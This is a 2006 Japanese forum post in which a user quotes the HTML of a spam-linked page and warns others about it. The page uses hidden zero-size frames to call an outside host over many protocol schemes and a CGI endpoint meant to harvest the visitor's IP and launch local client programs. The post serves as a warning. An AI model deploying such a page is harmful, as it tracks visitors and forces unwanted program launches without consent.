| 辿ってみました 投稿者:Midzz@野次馬モード 投稿日:2006/12/31(Sun) 03:36 No.1123 |
|
 |
野次馬根性でスパムのリンクを辿ってみましたw こんなページみたいです。悪意に満ちてます… orz。
# httpはh消しました。←投稿制限
<html> <frameset rows="100%,0,0,0,0,0,0,0,0,0"> <frame src="ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi?mode=ipget&port=7443"> <frame src="ftp://www.hellplant.org:7443/" scrolling=no noresize> <frame src="gopher://www.hellplant.org:7443/" scrolling=no noresize> <frame src="https://www.hellplant.org:7443/" scrolling=no noresize> <frame src="pnm://www.hellplant.org:7443/pnmiptrace" scrolling=no noresize> <frame src="mms://www.hellplant.org:7443/mmsiptrace" scrolling=no noresize> <frame src="rlogin://www.hellplant.org:7443/" scrolling=no noresize> <frame src="tn3270://www.hellplant.org:7443/" scrolling=no noresize> <frame src="telnet://www.hellplant.org:7443/" scrolling=no noresize> <frame src="news://www.hellplant.org:7443/" scrolling=no noresize> </frameset> </html>
perlでhttpソースを取得しただけなんですが、フレームの先は見に行ってしまう様子。危険ですね〜……。反応はしなかったんですが。 上記のプロトコルに例えばOutlookとかMedia Playerとかが反応すると、ごっちゃらごっちゃら起動するらしいです。 IP抜こうともするので、触らないように気をつけてください。意味がわからなければなおさら。
……こんなことしてるから私やけどするんですよね(^^;。 |
|